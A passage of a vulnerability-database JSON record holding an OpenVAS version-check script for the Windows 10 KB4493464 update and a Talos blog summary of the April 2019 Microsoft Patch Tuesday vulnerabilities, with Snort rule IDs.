"2019-04-10T00:00:00", "id": "OPENVAS:1361412562310815020", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815020", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4493464)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815020\");\n script_version(\"2020-06-04T09:02:37+0000\");\n script_cve_id(\"CVE-2019-0685\", \"CVE-2019-0688\", \"CVE-2019-0730\", \"CVE-2019-0848\",\n \"CVE-2019-0849\", \"CVE-2019-0731\", \"CVE-2019-0732\", \"CVE-2019-0851\",\n \"CVE-2019-0853\", \"CVE-2019-0856\", \"CVE-2019-0735\", \"CVE-2019-0739\",\n \"CVE-2019-0752\", \"CVE-2019-0753\", \"CVE-2019-0764\", \"CVE-2019-0859\",\n \"CVE-2019-0860\", \"CVE-2019-0861\", \"CVE-2019-0862\", \"CVE-2019-0786\",\n \"CVE-2019-0790\", \"CVE-2019-0791\", \"CVE-2019-0877\", \"CVE-2019-0879\",\n \"CVE-2019-0792\", \"CVE-2019-0793\", \"CVE-2019-0794\", \"CVE-2019-0795\",\n \"CVE-2019-0796\", \"CVE-2019-0806\", \"CVE-2019-0810\", \"CVE-2019-0812\",\n \"CVE-2019-0814\", \"CVE-2019-0829\", \"CVE-2019-0835\", \"CVE-2019-0836\",\n \"CVE-2019-0837\", \"CVE-2019-0838\", \"CVE-2019-0839\", \"CVE-2019-0840\",\n \"CVE-2019-0841\", \"CVE-2019-0842\", \"CVE-2019-0844\", \"CVE-2019-0845\",\n \"CVE-2019-0846\", \"CVE-2019-0847\", \"CVE-2019-0802\", \"CVE-2019-0803\",\n \"CVE-2019-0805\", \"CVE-2017-5715\", \"CVE-2017-5753\", \"CVE-2017-5754\",\n \"CVE-2019-0671\", \"CVE-2019-0673\", \"CVE-2019-0674\", \"CVE-2019-0694\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 09:02:37 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-04-10 09:14:49 +0530 (Wed, 10 Apr 2019)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4493464)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4493464\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - The scripting engine improperly handles objects in memory in Microsoft Edge.\n\n - Windows AppX Deployment Service (AppXSVC) improperly handles hard links.\n\n - Windows kernel improperly handles objects in memory.\n\n - The IOleCvt interface improperly renders ASP webpage content.\n\n - The scripting engine improperly handles objects in memory in Internet Explorer.\n\n - Windows improperly handles calls to the LUAFV driver.\n\n - Windows GDI component improperly discloses the contents of its memory.\n\n - Windows Client Server Run-Time Subsystem (CSRSS) fails to properly handle\n objects in memory.\n\n - Microsoft XML Core Services MSXML parser improperly processes user input.\n\n - OLE automation improperly handles objects in memory.\n\n - Windows Task Scheduler improperly discloses credentials to Windows Credential\n Manager.\n\n - Terminal Services component improperly discloses the contents of its memory.\n\n - The Win32k component fails to properly handle objects in memory.\n\n - The win32k component improperly provides kernel information.\n\n - Windows Jet Database Engine improperly handles objects in memory.\n\n - Windows improperly handles objects in memory.\n\n - Microsoft browsers do not properly validate input under specific conditions.\n\n - An error in the Microsoft Server Message Block (SMB) Server when an attacker\n with valid credentials attempts to open a specially crafted file over the SMB\n protocol on the same machine.\n\n - Windows TCP/IP stack improperly handles fragmented IP packets.\n\n - Windows DirectX improperly handles objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to escalate privileges, run arbitrary code, disclose sensitive information,\n bypass security restrictions and compromise the user's system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1803 for 32-bit Systems\n\n - Microsoft Windows 10 Version 1803 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4493464\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.17134.0\", test_version2:\"11.0.17134.705\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.17134.0 - 11.0.17134.705\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2019-04-24T16:19:07", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0685", "CVE-2019-0688", "CVE-2019-0730", "CVE-2019-0731", "CVE-2019-0732", "CVE-2019-0735", "CVE-2019-0739", "CVE-2019-0752", "CVE-2019-0753", "CVE-2019-0764", "CVE-2019-0786", "CVE-2019-0790", "CVE-2019-0791", "CVE-2019-0792", "CVE-2019-0793", "CVE-2019-0794", "CVE-2019-0795", "CVE-2019-0796", "CVE-2019-0801", "CVE-2019-0802", "CVE-2019-0803", "CVE-2019-0805", "CVE-2019-0806", "CVE-2019-0810", "CVE-2019-0812", "CVE-2019-0813", "CVE-2019-0814", "CVE-2019-0815", "CVE-2019-0817", "CVE-2019-0822", "CVE-2019-0823", "CVE-2019-0824", "CVE-2019-0825", "CVE-2019-0826", "CVE-2019-0827", "CVE-2019-0828", "CVE-2019-0829", "CVE-2019-0830", "CVE-2019-0831", "CVE-2019-0833", "CVE-2019-0835", "CVE-2019-0836", "CVE-2019-0837", "CVE-2019-0838", "CVE-2019-0839", "CVE-2019-0840", "CVE-2019-0841", "CVE-2019-0842", "CVE-2019-0844", "CVE-2019-0845", "CVE-2019-0846", "CVE-2019-0847", "CVE-2019-0848", "CVE-2019-0849", "CVE-2019-0851", "CVE-2019-0853", "CVE-2019-0856", "CVE-2019-0857", "CVE-2019-0858", "CVE-2019-0859", "CVE-2019-0860", "CVE-2019-0861", "CVE-2019-0862", "CVE-2019-0866", "CVE-2019-0867", "CVE-2019-0868", "CVE-2019-0869", "CVE-2019-0870", "CVE-2019-0871", "CVE-2019-0874", "CVE-2019-0875", "CVE-2019-0876", "CVE-2019-0877", "CVE-2019-0879"], "description": "[](<http://3.bp.blogspot.com/-bIERk6jqSvs/XKypl8tltSI/AAAAAAAAFxU/d9l6_EW1Czs7DzBngmhg8pjdPfhPAZ3yACK4BGAYYCw/s1600/recurring%2Bblog%2Bimages_patch%2Btuesday.jpg>) \n \n \n \n \n \n \n \n \n \n \n \n \n \n \nMicrosoft released its monthly security update today, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 74 vulnerabilities, 16 of which are rated \u201ccritical\u201d and 58 that are considered \u201cimportant.\u201d This release also includes a critical advisory covering a security update to Adobe Flash Player. \n \nThis month\u2019s security update covers security issues in a variety of Microsoft\u2019s products, including the Chakra Scripting Engine, Microsoft Office and Windows 10. For more on our coverage of these bugs, check out the Snort blog post [here](<https://blog.snort.org/2019/04/snort-rule-update-for-april-9-2019.html>), covering all of the new rules we have for this release. \n \n\n\n### Critical vulnerabilities\n\nMicrosoft disclosed 16 critical vulnerabilities this month, four of which we will highlight below. \n \n[CVE-2019-0753](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0753>) is a remote code execution vulnerability in the Microsoft Scripting Engine that exists in the way the Internet Explorer web browser handles objects in memory. The bug could allow an attacker to corrupt the system in a way that would allow them to gain the same rights as the current user and execute code remotely. In order to trigger this vulnerability, the attacker needs to convince the user to open a specially crafted website in Internet Explorer. They could also embed an ActiveX control marked \u201csafe for initialization\u201d in an application or Microsoft Office document that hosts the Internet Explorer rendering engine. \n \n[CVE-2019-0790](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0790>), [CVE-2019-0791](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0791>), [CVE-2019-0792](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0792>), [CVE-2019-0793](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0793>) and [CVE-2019-0795](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0795>) are all remote code execution vulnerabilities that arise when the Microsoft XML Core Services MSXML parser processes user input. An attacker could exploit any of these bugs to take control of the user\u2019s system. A user could trigger these vulnerabilities by visiting an attacker-created web page that contains malicious MSXML. \n \nThe other critical vulnerabilities are: \n\n\n * [CVE-2019-0739](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0739>)\n * [CVE-2019-0786](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0786>)\n * [CVE-2019-0806](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0806>)\n * [CVE-2019-0810](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0810>)\n * [CVE-2019-0812](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0812>)\n * [CVE-2019-0829](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0829>)\n * [CVE-2019-0845](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0845>)\n * [CVE-2019-0853](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0853>)\n * [CVE-2019-0860](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0860>)\n * [CVE-2019-0861](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0861>)\n\n### Important vulnerabilities\n\nThis release also contains 58 important vulnerabilities, eight of which we will highlight below. \n \n[CVE-2019-0732](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0732>) is a feature bypass vulnerability in several versions of the Windows operating system that could allow an attacker to bypass Windows Device Guard. This bug exists because Windows improperly handles calls to the LUAFV driver. An attacker could exploit this vulnerability by accessing the local machine and then running a malicious program, giving them the ability to evade a User Mode Code Integrity policy on the machine. \n \n[CVE-2019-0752](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0752>) is a remote code execution vulnerability in the Microsoft Scripting Engine that exists in the way the Internet Explorer web browser handles objects in memory. The bug could allow an attacker to corrupt the system in a way that would allow them to gain the same rights as the current user and execute code remotely. In order to trigger this vulnerability, the attacker needs to convince the user to open a specially crafted website in Internet Explorer. They could also embed an ActiveX control marked \u201csafe for initialization\u201d in an application or Microsoft Office document that hosts the Internet Explorer rendering engine. \n \n[CVE-2019-0790](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0790>) and [CVE-2019-0795](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0795>) are remote code execution vulnerabilities that arise when the Microsoft XML Core Services MSXML parser processes user input. An attacker could exploit any of these bugs to take control of the user\u2019s system. A user could trigger these vulnerabilities by visiting an attacker-created web page that contains malicious MSXML. \n \n[CVE-2019-0801](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0801>) is a remote code execution vulnerability in Microsoft Office that arises when the software attempts to open PowerPoint or Excel files. An attacker could exploit this bug by tricking the user into clicking on a specially crafted URL file that points to an Excel or PowerPoint file, causing the file to download. \n \n[CVE-2019-0803](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0803>) and [CVE-2019-0859](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0859>) are elevation of privilege vulnerabilities in some versions of Windows that exist when the Win32k component improperly handles objects in memory. If exploited, an attacker could gain the ability to run arbitrary code in kernel mode. An attacker could exploit this bug by logging onto the system and then running a specially crafted application. \n \n[CVE-2019-0822](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0822>) is a remote code execution vulnerability that exists in the way Microsoft Graphics Components handles objects in memory. An attacker could exploit this vulnerability by tricking the user into opening a specially crafted file, eventually allowing them to execute arbitrary code in the context of the current user. \n \nThe other important vulnerabilities are: \n\n\n * [CVE-2019-0685](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0685>)\n * [CVE-2019-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0688>)\n * [CVE-2019-0730](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0730>)\n * [CVE-2019-0731](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0731>)\n * [CVE-2019-0735](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0735>)\n * [CVE-2019-0764](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0764>)\n * [CVE-2019-0794](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0794>)\n * [CVE-2019-0796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0796>)\n * [CVE-2019-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0802>)\n * [CVE-2019-0805](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0805>)\n * [CVE-2019-0814](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0814>)\n * [CVE-2019-0815](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0815>)\n * [CVE-2019-0817](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0817>)\n * [CVE-2019-0823](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0823>)\n * [CVE-2019-0824](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0824>)\n * [CVE-2019-0825](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0825>)\n * [CVE-2019-0826](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0826>)\n * [CVE-2019-0827](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0827>)\n * [CVE-2019-0828](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0828>)\n * [CVE-2019-0830](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0830>)\n * [CVE-2019-0831](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0831>)\n * [CVE-2019-0833](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0833>)\n * [CVE-2019-0835](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0835>)\n * [CVE-2019-0836](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0836>)\n * [CVE-2019-0837](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0837>)\n * [CVE-2019-0838](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0838>)\n * [CVE-2019-0839](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0839>)\n * [CVE-2019-0840](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0840>)\n * [CVE-2019-0841](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0841>)\n * [CVE-2019-0842](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0842>)\n * [CVE-2019-0844](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0844>)\n * [CVE-2019-0846](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0846>)\n * [CVE-2019-0847](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0847>)\n * [CVE-2019-0848](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0848>)\n * [CVE-2019-0849](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0849>)\n * [CVE-2019-0851](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0851>)\n * [CVE-2019-0856](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0856>)\n * [CVE-2019-0857](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0857>)\n * [CVE-2019-0858](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0858>)\n * [CVE-2019-0862](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0862>)\n * [CVE-2019-0866](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0866>)\n * [CVE-2019-0867](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0867>)\n * [CVE-2019-0868](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0868>)\n * [CVE-2019-0869](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0869>)\n * [CVE-2019-0870](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0870>)\n * [CVE-2019-0871](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0871>)\n * [CVE-2019-0874](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0874>)\n * [CVE-2019-0876](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0876>)\n * [CVE-2019-0877](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0877>)\n * [CVE-2019-0875](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0875>)\n * [CVE-2019-0879](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0879>)\n * [CVE-2019-0813](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0813>)\n\n### Coverage \n\nIn response to these vulnerability disclosures, Talos is releasing the following SNORT\u24c7 rules that detect attempts to exploit them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org. \n \nSnort rules: [45632, 45635, 46548, 46549, 49380, 49381, 49688, 49689, 49692 - 49711, 49716 - 49723, 49727 - 49747, 49750 - 49755](<https://snort.org/advisories/talos-rules-2019-04-09>)\n\n", "modified": "2019-04-09T11:10:02", "published": "2019-04-09T11:10:02", "id": "TALOSBLOG:C41259322CA5338694B85978B0EA6FA5", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/CofmJ4xJGzg/microsoft-patch-tuesday-april-2019.html", "type": "talosblog", "title": "Microsoft Patch Tuesday \u2014 April 2019: Vulnerability disclosures and Snort coverage", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
